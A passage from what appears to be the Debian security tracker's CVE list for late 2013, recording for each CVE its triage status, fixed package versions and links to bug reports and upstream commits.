	NOT-FOR-US: Simple Machines Forum
CVE-2013-7234 (Simple Machines Forum (SMF) before 1.1.19 and 2.x before 2.0.6 allows ...)
	NOT-FOR-US: Simple Machines Forum
CVE-2013-7225 (Multiple SQL injection vulnerabilities in app/controllers/home_control ...)
	NOT-FOR-US: Fat Free CRM
CVE-2013-7224 (Fat Free CRM before 0.12.1 does not restrict JSON serialization, which ...)
	NOT-FOR-US: Fat Free CRM
CVE-2013-7223 (Multiple cross-site request forgery (CSRF) vulnerabilities in Fat Free ...)
	NOT-FOR-US: Fat Free CRM
CVE-2013-7222 (config/initializers/secret_token.rb in Fat Free CRM before 0.12.1 has ...)
	NOT-FOR-US: Fat Free CRM
CVE-2013-7221 (The automatic screen lock functionality in GNOME Shell (aka gnome-shel ...)
	- gnome-shell 3.10.1-1
	[wheezy] - gnome-shell (Vulnerable code not present)
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=708313
	NOTE: https://git.gnome.org/browse/gnome-shell/commit/js/ui/main.js?id=efdf1ff755943fba1f8a9aaeff77daa3ed338088
CVE-2013-7220 (js/ui/screenShield.js in GNOME Shell (aka gnome-shell) before 3.8 allo ...)
	- gnome-shell 3.8.4-1
	[wheezy] - gnome-shell (Vulnerable code not present)
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=686740
	NOTE: https://git.gnome.org/browse/gnome-shell/commit/js/ui/screenShield.js?id=209014b083dbe86ed0e0860a6016735571b56f94
CVE-2013-7205 (Off-by-one error in the process_cgivars function in contrib/daemonchk. ...)
	{DLA-1615-1}
	- nagios3 (low; bug #771466)
	[squeeze] - nagios3 (Minor issue)
	[wheezy] - nagios3 (Minor issue)
	NOTE: additional changed files for nagios3, cf. CVE-2013-7108
	NOTE: Fixed by https://sourceforge.net/p/nagios/nagioscore/ci/d97e03f32741a7d851826b03ed73ff4c9612a866/
	NOTE: See also https://github.com/Icinga/icinga-core/issues/1399
CVE-2013-7203 (gitolite before commit fa06a34 might allow local users to read arbitra ...)
	- gitolite3 3.5.3.1-1
	NOTE: http://marc.info/?l=oss-security&m=138783069700756&w=2
CVE-2013-7191 (Cross-site scripting (XSS) vulnerability in Tenmiles Helpdesk Pilot al ...)
	NOT-FOR-US: Tenmiles Helpdesk Pilot
CVE-2013-7189 (Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibl ...)
	NOT-FOR-US: iScripts AutoHoster
CVE-2013-7188 (Cross-site scripting (XSS) vulnerability in KBKP Software HostBill bef ...)
	NOT-FOR-US: HostBill
CVE-2013-7187 (SQL injection vulnerability in form.php in the FormCraft plugin 1.3.7 ...)
	NOT-FOR-US: WordPress plugin FormCraft
CVE-2013-7149 (SQL injection vulnerability in www/delivery/axmlrpc.php (aka the XML-R ...)
	NOT-FOR-US: Revive Adserver
CVE-2013-7148
	REJECTED
CVE-2013-7147
	REJECTED
CVE-2013-7146
	REJECTED
CVE-2013-7145
	REJECTED
CVE-2013-7144 (LINE 3.2.1.83 and earlier on Windows and 3.2.1 and earlier on OS X doe ...)
	NOT-FOR-US: LINE
CVE-2013-7143 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-7142 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-7141 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-7140 (XML External Entity (XXE) vulnerability in the CalDAV interface in Ope ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-7139 (SQL injection vulnerability in download.php in Horizon Quick Content M ...)
	NOT-FOR-US: Horizon CMS
CVE-2013-7138 (Directory traversal vulnerability in lib/functions/d-load.php in Horiz ...)
	NOT-FOR-US: Horizon CMS
CVE-2013-7137 (The "remember me" functionality in login.php in Burden before 1.8.1 al ...)
	NOT-FOR-US: Burden
CVE-2013-7136 (The UPC Ireland Cisco EPC 2425 router (aka Horizon Box) does not have ...)
	NOT-FOR-US: Cisco
CVE-2013-7135 (The Proc::Daemon module 0.14 for Perl uses world-writable permissions ...)
	- libproc-daemon-perl 0.14-2 (low; bug #732283)
	[wheezy] - libproc-daemon-perl (Minor issue)
	[squeeze] - libproc-daemon-perl (does not have pid_file option)
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=91450
CVE-2013-7134 (Juvia uses the same secret key for all installations, which allows rem ...)
	NOT-FOR-US: Juvia
CVE-2013-7133
	RESERVED
CVE-2013-7132
	RESERVED
CVE-2013-7131
	RESERVED
CVE-2013-7130 (The i_create_images_and_backing (aka create_images_and_backing) method ...)
	- nova 2013.2.2 (low; bug #736465)
	[wheezy] - nova (Minor issue)
	NOTE: https://bugs.launchpad.net/nova/+bug/1251590
CVE-2013-7129 (Cross-site scripting (XSS) vulnerability in ThemeBeans Blooog theme 1. ...)
	NOT-FOR-US: WordPress theme
CVE-2013-7128 (Valve Bug Reporter in the valve-bugreporter package 2.10+bsos1 in Valv ...)
	NOT-FOR-US: SteamOS
CVE-2013-7127 (Apple Safari 6.0.5 on Mac OS X 10.7.5 and 10.8.5 stores cleartext cred ...)
	NOT-FOR-US: Apple Safari
CVE-2013-7126
	REJECTED
CVE-2013-7125
	REJECTED
CVE-2013-7124
	REJECTED
CVE-2013-7123
	REJECTED
CVE-2013-7122
	REJECTED
CVE-2013-7121
	REJECTED
CVE-2013-7120
	REJECTED
CVE-2013-7119
	REJECTED
CVE-2013-7118
	REJECTED
CVE-2013-7117
	REJECTED
CVE-2013-7116
	REJECTED
CVE-2013-7115
	REJECTED
CVE-2013-7109 (OpenStack Swift as of 2013-12-15 mishandles PYTHON_EGG_CACHE ...)
	- glance 2012.1~e4-1
	NOTE: https://github.com/openstack/glance/commit/804396204e23ebb
CVE-2013-7105 (Buffer overflow in the Interstage HTTP Server log functionality, as us ...)
	NOT-FOR-US: Fujitsu Interstage HTTP Server
CVE-2013-7104 (McAfee Email Gateway 7.6 allows remote authenticated administrators to ...)
	NOT-FOR-US: McAfee Email Gateway
CVE-2013-7103 (McAfee Email Gateway 7.6 allows remote authenticated administrators to ...)
	NOT-FOR-US: McAfee Email Gateway
CVE-2013-7102 (Multiple unrestricted file upload vulnerabilities in (1) media-upload. ...)
	NOT-FOR-US: WordPress theme OptimizePress
CVE-2013-7101
	RESERVED
CVE-2013-7100 (Buffer overflow in the unpacksms16 function in apps/app_sms.c in Aster ...)
	{DSA-2835-1}
	NOTE: http://downloads.asterisk.org/pub/security/AST-2013-006.html
	- asterisk 1:11.7.0~dfsg-1 (bug #732355)
CVE-2013-7099
	RESERVED
CVE-2013-7098 (OpenConnect VPN client with GnuTLS before 5.02 contains a heap overflo ...)
	- openconnect 5.02-1
CVE-2013-7097 (Directory traversal vulnerability in 7 Media Web Solutions eduTrac bef ...)
	NOT-FOR-US: eduTrac
CVE-2013-7096 (Multiple SQL injection vulnerabilities in SAP EMR Unwired allow remote ...)
	NOT-FOR-US: Sap EMR
CVE-2013-7095 (The XML parser (crm_flex_data) in SAP Customer Relationship Management ...)
	NOT-FOR-US: Sap CRM
CVE-2013-7094 (SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2013-7093 (SAP Network Interface Router (SAProuter) 39.3 SP4 allows remote attack ...)
	NOT-FOR-US: SAP Network Interface Router
CVE-2013-7092 (Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/ ...)
	NOT-FOR-US: McAfee Email Gateway
CVE-2013-7091 (Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,Aj ...)
	NOT-FOR-US: Zimbra
CVE-2013-7090
	RESERVED
CVE-2013-7084
	RESERVED
CVE-2013-7114 (Multiple buffer overflows in the create_ntlmssp_v2_key function in epa ...)
	{DSA-2825-1}
	- wireshark 1.10.4-1
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-68.html
CVE-2013-7113 (epan/dissectors/packet-bssgp.c in the BSSGP dissector in Wireshark 1.1 ...)
	{DSA-2825-1}
	- wireshark 1.10.4-1
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-67.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9488
CVE-2013-7112 (The dissect_sip_common function in epan/dissectors/packet-sip.c in the ...)
	{DLA-497-1}
	- wireshark 1.10.4-1 (unimportant)
	NOTE: https://www.wireshark.org/security/wnpa-sec-2013-66.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9388
	NOTE: Not suitable for code injection
CVE-2013-7111 (The put_call function in the API client (api/api_client.rb) in the Bas ...)
	NOT-FOR-US: Bio Basespace SDK Ruby Gem
CVE-2013-7110 (Transifex command-line client before 0.10 does not validate X.509 cert ...)
	- transifex-client 0.10-1
	[wheezy] - transifex-client (Incomplete patch was never released)
	NOTE: fix for CVE-2013-2073 was incorrect/incomplete
	NOTE: https://github.com/transifex/transifex-client/issues/42
	NOTE: https://github.com/transifex/transifex-client/commit/6d69d61
CVE-2013-7108 (Multiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, a ...)
	{DSA-2956-1 DLA-1615-1 DLA-60-1}
	- icinga 1.10.2-1 (low)
	- nagios3 (low; bug #771466)
	[squeeze] - nagios3 (Minor issue)
	[wheezy] - nagios3 (Minor issue)
	NOTE: https://dev.icinga.org/issues/5251
	NOTE: separate CVE requested for nagios, https://www.openwall.com/lists/oss-security/2013/12/23/4
	NOTE: Fixed by https://sourceforge.net/p/nagios/nagioscore/ci/d97e03f32741a7d851826b03ed73ff4c9612a866/
CVE-2013-7107 (Cross-site request forgery (CSRF) vulnerability in cmd.cgi in Icinga 1 ...)
	{DSA-2956-1}
	- icinga 1.10.2-1 (low)
	[squeeze] - icinga (Minor issue)
	- nagios3 (low)
	[jessie] - nagios3 (Minor issue)
	[squeeze] - nagios3 (Minor issue)
	[wheezy] - nagios3 (Minor issue)
	NOTE: https://dev.icinga.org/issues/5346
CVE-2013-7106 (Multiple stack-based buffer overflows in Icinga before 1.8.5, 1.9 befo ...)
	{DSA-2956-1}
	- icinga 1.10.2-1
	[squeeze] - icinga (Vulnerable code not present)
	NOTE: https://dev.icinga.org/issues/5250
CVE-2013-7083
	RESERVED
CVE-2013-7068 (The Organic Groups (OG) module 7.x-2.x before 7.x-2.3 for Drupal allow ...)
	NOT-FOR-US: Drupal module
CVE-2013-7067 (The OG Features module 6.x-1.x before 6.x-1.4 for Drupal does not prop ...)
	NOT-FOR-US: Drupal module
CVE-2013-7066 (The Entity reference module 7.x-1.x before 7.x-1.1-rc1 for Drupal allo ...)
	NOT-FOR-US: Drupal module
CVE-2013-7065 (The Organic Groups (OG) module 7.x-2.x before 7.x-2.3 for Drupal allow ...)
	NOT-FOR-US: Drupal module
CVE-2013-7064 (Cross-site scripting (XSS) vulnerability in the EU Cookie Compliance m ...)
	NOT-FOR-US: Drupal module
CVE-2013-7063 (The Invitation module 7.x-2.x for Drupal does not properly check permi ...)
	NOT-FOR-US: Drupal module
CVE-2013-7059
	RESERVED
CVE-2013-7058
	RESERVED
CVE-2013-7057 (Cross-site request forgery (CSRF) vulnerability in Axway SecureTranspo ...)
	NOT-FOR-US: Axway SecureTransport
CVE-2013-7056
	RESERVED
CVE-2013-7055 (D-Link DIR-100 4.03B07 has PPTP and poe information disclosure ...)
	NOT-FOR-US: Router D-Link DIR-100
CVE-2013-7054 (D-Link DIR-100 4.03B07: cli.cgi XSS ...)
	NOT-FOR-US: Router D-Link DIR-100
CVE-2013-7053 (D-Link DIR-100 4.03B07: cli.cgi CSRF ...)
	NOT-FOR-US: Router D-Link DIR-100
CVE-2013-7052 (D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi ...)
	NOT-FOR-US: Router D-Link DIR-100
CVE-2013-7051 (D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to chec ...)
	NOT-FOR-US: Router D-Link DIR-100
CVE-2013-7047
	RESERVED
CVE-2013-7046
	RESERVED
CVE-2013-7045
	RESERVED
CVE-2013-7044
	RESERVED
CVE-2013-7043 (Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Sc ...)
	NOT-FOR-US: Cisco
CVE-2013-7042 (SUSE Lifecycle Management Server (SLMS) before 1.3.7 uses world-readab ...)
	NOT-FOR-US: SUSE Lifecycle Management Server
CVE-2013-7037
	RESERVED
CVE-2013-7036
	RESERVED
CVE-2013-7035
	RESERVED
CVE-2013-7034 (The setCookieValue function in _lib/functions.global.inc.php in LiveZi ...)
	NOT-FOR-US: LiveZilla
CVE-2013-7033 (LiveZilla before 5.1.2.1 includes the operator password in plaintext i ...)
	NOT-FOR-US: LiveZilla
CVE-2013-7032 (Multiple cross-site scripting (XSS) vulnerabilities in the web based o ...)
NOT-FOR-US: LiveZilla CVE-2013-7031 RESERVED CVE-2013-7030 (** DISPUTED ** The TFTP service in Cisco Unified Communications Manage ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-7029 RESERVED CVE-2013-7028 RESERVED CVE-2013-7027 (The ieee80211_radiotap_iterator_init function in net/wireless/radiotap ...) - linux 3.11.7-1 (unimportant) [wheezy] - linux 3.2.53-1 - linux-2.6 (unimportant) NOTE: Non-issue: https://bugzilla.redhat.com/show_bug.cgi?id=1040010#c1 CVE-2013-7026 (Multiple race conditions in ipc/shm.c in the Linux kernel before 3.12. ...) - linux 3.12.5-1 [wheezy] - linux (Introduced in 8b8d52ac382b) - linux-2.6 (Introduced in 8b8d52ac382b) CVE-2013-7089 (ClamAV before 0.97.7: dbg_printhex possible information leak ...) - clamav 0.97.7+dfsg-1 NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=6804 CVE-2013-7088 (ClamAV before 0.97.7 has buffer overflow in the libclamav component ...) - clamav 0.97.7+dfsg-1 NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=6809 NOTE: https://github.com/vrtadmin/clamav-devel/commit/e8e3746266dd3f82054ca137b81b800e54de6ebd CVE-2013-7087 (ClamAV before 0.97.7 has WWPack corrupt heap memory ...) - clamav 0.97.7+dfsg-1 NOTE: https://github.com/vrtadmin/clamav-devel/commit/71990820d01c246e4e61408a3659dd9d92949b38 NOTE: from https://github.com/vrtadmin/clamav-devel/commits/master/libclamav/wwunpack.c CVE-2013-7086 (The message function in lib/webbynode/notify.rb in the Webbynode gem 1 ...) NOT-FOR-US: Ruby Gem Webbynode CVE-2013-7085 (Uscan in devscripts 2.13.5, when USCAN_EXCLUSION is enabled, allows re ...) - devscripts 2.13.9 (bug #732006) [wheezy] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) [squeeze] - devscripts (does not contain the vulnerable code; introduced in 2.13.5) CVE-2013-7082 (Cross-site scripting (XSS) vulnerability in the errorAction method in ...) 
	NOT-FOR-US: TYPO3 Flow
	NOTE: https://review.typo3.org/#/c/26176/
	NOTE: CVE assigned for TYPO3 Flow, corresponds to CVE-2013-7078
CVE-2013-7081 (The (old) Form Content Element component in TYPO3 4.5.0 through 4.5.31 ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26182/
CVE-2013-7080 (The creating record functionality in Extension table administration li ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26178/
CVE-2013-7079 (Open redirect vulnerability in the OpenID extension in TYPO3 4.5.0 thr ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26179/
CVE-2013-7078 (Cross-site scripting (XSS) vulnerability in the errorAction method in ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26176/
CVE-2013-7077 (Cross-site scripting (XSS) vulnerability in the Backend User Administr ...)
	- typo3-src (Affects versions 6.0.0 to 6.0.11, 6.1.0 to 6.1.6)
CVE-2013-7076 (Cross-site scripting (XSS) vulnerability in Extension Manager in TYPO3 ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26181/
CVE-2013-7075 (The Content Editing Wizards component in TYPO3 4.5.0 through 4.5.31, 4 ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26175/
CVE-2013-7074 (Multiple cross-site scripting (XSS) vulnerabilities in Content Editing ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26184/
	NOTE: https://review.typo3.org/#/c/26183/
	NOTE: https://review.typo3.org/#/c/26177/
CVE-2013-7073 (The Content Editing Wizards component in TYPO3 4.5.0 through 4.5.31, 4 ...)
	{DSA-2834-1}
	- typo3-src 4.5.32+dfsg1-1 (bug #731999)
	NOTE: https://review.typo3.org/#/c/26180/
CVE-2013-7072
	REJECTED
CVE-2013-7071 (Cross-site scripting (XSS) vulnerability in the handle_request functio ...)
	NOT-FOR-US: Monitorix
CVE-2013-7070 (The handle_request function in lib/HTTPServer.pm in Monitorix before 3 ...)
	NOT-FOR-US: Monitorix
CVE-2013-7062 (Multiple cross-site scripting (XSS) vulnerabilities in Zope, as used i ...)
	- zope2.12 (low)
	[wheezy] - zope2.12 (Minor issue)
	- zope2.13 (Vulnerable code not present)
CVE-2013-7061 (Products/CMFPlone/CatalogTool.py in Plone 3.3 through 4.3.2 allows rem ...)
	NOT-FOR-US: Plone
CVE-2013-7060 (Products/CMFPlone/FactoryTool.py in Plone 3.3 through 4.3.2 allows rem ...)
	NOT-FOR-US: Plone
CVE-2013-7049 (Stack-based buffer overflow in fish.cpp in the Fish plugin for ZNC, as ...)
	NOTE: vulnerable code not found in Debian
	NOTE: https://www.openwall.com/lists/oss-security/2013/12/11/14
	NOT-FOR-US: FiSH Plugin for ZNC IRC Bouncer
CVE-2013-7048 (OpenStack Compute (Nova) Grizzly 2013.1.4, Havana 2013.2.1, and earlie ...)
	- nova 2013.2.2 (bug #732022)
	[wheezy] - nova (Support for live snapshots added later)
	NOTE: https://bugs.launchpad.net/nova/+bug/1227027
CVE-2013-7050 (The get_main_source_dir function in scripts/uscan.pl in devscripts bef ...)
	- devscripts 2.13.8 (bug #731849)
	[wheezy] - devscripts (does not contain the vulnerable code; introduced in 2.13.5)
	[squeeze] - devscripts (does not contain the vulnerable code; introduced in 2.13.5)
	NOTE: http://anonscm.debian.org/gitweb/?p=collab-maint/devscripts.git;a=commitdiff;h=91f05b5
CVE-2013-7069 (ack 2.00 through 2.11_02 allows remote attackers to execute arbitrary ...)
	- ack-grep 2.12-1 (bug #731848)
	[wheezy] - ack-grep (don't support per-project .ackrc files)
	[squeeze] - ack-grep (don't support per-project .ackrc files)
	NOTE: https://github.com/petdance/ack2/issues/399
CVE-2013-7025 (Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlert ...)
	NOT-FOR-US: Dell SonicWALL Global Management System
CVE-2013-7007
	RESERVED
CVE-2013-7006
	RESERVED
CVE-2013-7005 (D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware be ...)
	NOT-FOR-US: D-Link DSR-150
CVE-2013-7004 (D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware be ...)
	NOT-FOR-US: D-Link DSR-150
CVE-2013-7003 (Multiple cross-site scripting (XSS) vulnerabilities in LiveZilla befor ...)
	NOT-FOR-US: LiveZilla
CVE-2013-7041 (The pam_userdb module for Pam uses a case-insensitive method to compar ...)
	- pam 1.1.8-3.1 (low; bug #731368)
	[squeeze] - pam (Minor issue)
	[wheezy] - pam (Minor issue)
CVE-2013-7040 (Python 2.7 before 3.4 only uses the last eight bits of the prefix to r ...)
	- python2.5 (unimportant)
	- python2.6 (unimportant)
	- python2.7 (unimportant)
	- python3.1 (unimportant)
	- python3.2 (unimportant)
	- python3.3 (unimportant)
	- python3.4 3.4.0-1 (unimportant)
	NOTE: upstream tagged this as wontfix for versions older than 3.4
CVE-2013-7039 (Stack-based buffer overflow in the MHD_digest_auth_check function in l ...)
	- libmicrohttpd 0.9.32-1 (low; bug #731933)
	[wheezy] - libmicrohttpd 0.9.20-1+deb7u1
	[squeeze] - libmicrohttpd (Minor issue, only exploitable in corner cases)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039390
CVE-2013-7038 (The MHD_http_unescape function in libmicrohttpd before 0.9.32 might al ...)
	- libmicrohttpd 0.9.32-1 (low; bug #731933)
	[squeeze] - libmicrohttpd (Minor issue)
	[wheezy] - libmicrohttpd (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039384
CVE-2013-7024 (The jpeg2000_decode_tile function in libavcodec/jpeg2000dec.c in FFmpe ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/fe448cd28d674c3eff3072552eae366d0b659ce9
	NOTE: https://trac.ffmpeg.org/ticket/2921
	NOTE: Only present in libav trunk
CVE-2013-7023 (The ff_combine_frame function in libavcodec/parser.c in FFmpeg before ...)
	- ffmpeg (max_alloc not present in old ffmpeg/libav)
	- libav (max_alloc not present in old ffmpeg/libav)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/f31011e9abfb2ae75bb32bc44e2c34194c8dc40a
	NOTE: https://trac.ffmpeg.org/ticket/2982
CVE-2013-7022 (The g2m_init_buffers function in libavcodec/g2meet.c in FFmpeg before ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/e07ac727c1cc9eed39e7f9117c97006f719864bd
	NOTE: https://trac.ffmpeg.org/ticket/2971
	NOTE: Only present in libav trunk
CVE-2013-7021 (The filter_frame function in libavfilter/vf_fps.c in FFmpeg before 2.1 ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/cdd5df8189ff1537f7abe8defe971f80602cc2d2
	NOTE: https://trac.ffmpeg.org/ticket/2905
CVE-2013-7020 (The read_header function in libavcodec/ffv1dec.c in FFmpeg before 2.1 ...)
	{DSA-3027-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:10.4-1
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/b05cd1ea7e45a836f7f6071a716c38bb30326e0f
CVE-2013-7019 (The get_cox function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/a1b9004b768bef606ee98d417bceb9392ceb788d
	NOTE: https://trac.ffmpeg.org/ticket/2898
	NOTE: Only present in libav trunk
CVE-2013-7018 (libavcodec/jpeg2000dec.c in FFmpeg before 2.1 does not ensure the use ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/9a271a9368eaabf99e6c2046103acb33957e63b7
	NOTE: https://trac.ffmpeg.org/ticket/2895
	NOTE: Only present in libav trunk
CVE-2013-7017 (libavcodec/jpeg2000.c in FFmpeg before 2.1 allows remote attackers to ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/912ce9dd2080c5837285a471d750fa311e09b555
	NOTE: Only present in libav trunk
CVE-2013-7016 (The get_siz function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/8bb11c3ca77b52e05a9ed1496a65f8a76e6e2d8f
	NOTE: https://trac.ffmpeg.org/ticket/2848
	NOTE: Only present in libav trunk
CVE-2013-7015 (The flashsv_decode_frame function in libavcodec/flashsv.c in FFmpeg be ...)
	{DSA-2855-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.11-1
	NOTE: ffmpeg fix: https://github.com/FFmpeg/FFmpeg/commit/880c73cd76109697447fbfbaa8e5ee5683309446
	NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=57070b1468edc6ac8cb3696c817f3c943975d4c1
	NOTE: https://trac.ffmpeg.org/ticket/2844
CVE-2013-7014 (Integer signedness error in the add_bytes_l2_c function in libavcodec/ ...)
	{DSA-2855-1}
	- ffmpeg (Vulnerable code not present)
	- libav 6:9.11-1
	NOTE: https://trac.ffmpeg.org/ticket/2919
	NOTE: Fix in ffmpeg: https://github.com/FFmpeg/FFmpeg/commit/86736f59d6a527d8bc807d09b93f971c0fe0bb07
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=d1916d13e28b87f4b1b214231149e12e1d536b4b
CVE-2013-7013 (The g2m_init_buffers function in libavcodec/g2meet.c in FFmpeg before ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/821a5938d100458f4d09d634041b05c860554ce0
	NOTE: https://trac.ffmpeg.org/ticket/2922
	NOTE: Only present in libav trunk
CVE-2013-7012 (The get_siz function in libavcodec/jpeg2000dec.c in FFmpeg before 2.1 ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/780669ef7c23c00836a24921fcc6b03be2b8ca4a
	NOTE: https://trac.ffmpeg.org/ticket/3080
	NOTE: Only present in libav trunk
CVE-2013-7011 (The read_header function in libavcodec/ffv1dec.c in FFmpeg before 2.1 ...)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav (Reproducer fails on libav 0.8.9 and 9.11)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/547d690d676064069d44703a1917e0dab7e33445
	NOTE: https://trac.ffmpeg.org/ticket/2906
CVE-2013-7010 (Multiple integer signedness errors in libavcodec/dsputil.c in FFmpeg b ...)
	{DSA-2855-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.11-1
	NOTE: ffmpeg fix: https://github.com/FFmpeg/FFmpeg/commit/454a11a1c9c686c78aa97954306fb63453299760
	NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=d1916d13e28b87f4b1b214231149e12e1d536b4b
CVE-2013-7009 (The rpza_decode_stream function in libavcodec/rpza.c in FFmpeg before ...)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav (Not reproducible with 0.8.9)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/3819db745da2ac7fb3faacb116788c32f4753f34
	NOTE: https://trac.ffmpeg.org/ticket/2850
CVE-2013-7008 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...)
	- ffmpeg (Vulnerable code not present)
	- libav (Crash not reproducible, libav code is different)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/29ffeef5e73b8f41ff3a3f2242d356759c66f91f
	NOTE: https://trac.ffmpeg.org/ticket/2927
CVE-2013-7002 (Cross-site scripting (XSS) vulnerability in mobile/php/translation/ind ...)
	NOT-FOR-US: LiveZilla
CVE-2013-7001 (The Multimedia Messaging Centre (MMSC) in NowSMS Now SMS & MMS Gat ...)
	NOT-FOR-US: NowSMS
CVE-2013-7000 (The Multimedia Messaging Centre (MMSC) in NowSMS Now SMS & MMS Gat ...)
	NOT-FOR-US: NowSMS
CVE-2013-6999 (** DISPUTED ** The IsHandleEntrySecure function in win32k.sys in the k ...)
	NOT-FOR-US: Microsoft Windows Server 2008 SP2
CVE-2013-6998
	REJECTED
CVE-2013-6997 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange (O ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-6996
	RESERVED
CVE-2013-6995
	REJECTED
CVE-2013-6994 (OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext ...)
	NOT-FOR-US: OpenText Exceed OnDemand
CVE-2013-6993 (Cross-site scripting (XSS) vulnerability in the Ad-minister plugin 0.6 ...)
	NOT-FOR-US: WordPress plugin Ad-minister
CVE-2013-6992 (Cross-site request forgery (CSRF) vulnerability in askapache-firefox-a ...)
	NOT-FOR-US: WordPress plugin AskApache Firefox Adsense
CVE-2013-6991 (Cross-site scripting (XSS) vulnerability in the WP-Cron Dashboard plug ...)
	NOT-FOR-US: WordPress plugin WP-Cron Dashboard
CVE-2013-6990 (FortiGuard FortiAuthenticator before 3.0 allows remote administrators ...)
	NOT-FOR-US: FortiGuard FortiAuthenticator
CVE-2013-6989
	RESERVED
CVE-2013-6988
	RESERVED
CVE-2013-6987 (Multiple directory traversal vulnerabilities in the FileBrowser compon ...)
	NOT-FOR-US: Synology DiskStation Manager
CVE-2013-6986 (The ZippyYum Subway CA Kiosk app 3.4 for iOS uses cleartext storage in ...)
	NOT-FOR-US: ZippyYum
CVE-2013-6984
	RESERVED
CVE-2013-6983 (SQL injection vulnerability in the web interface in Cisco Unified Pres ...)
	NOT-FOR-US: Cisco Unified Presence Server
CVE-2013-6982 (The BGP implementation in Cisco NX-OS 6.2(2a) and earlier does not pro ...)
	NOT-FOR-US: Cisco NX-OS
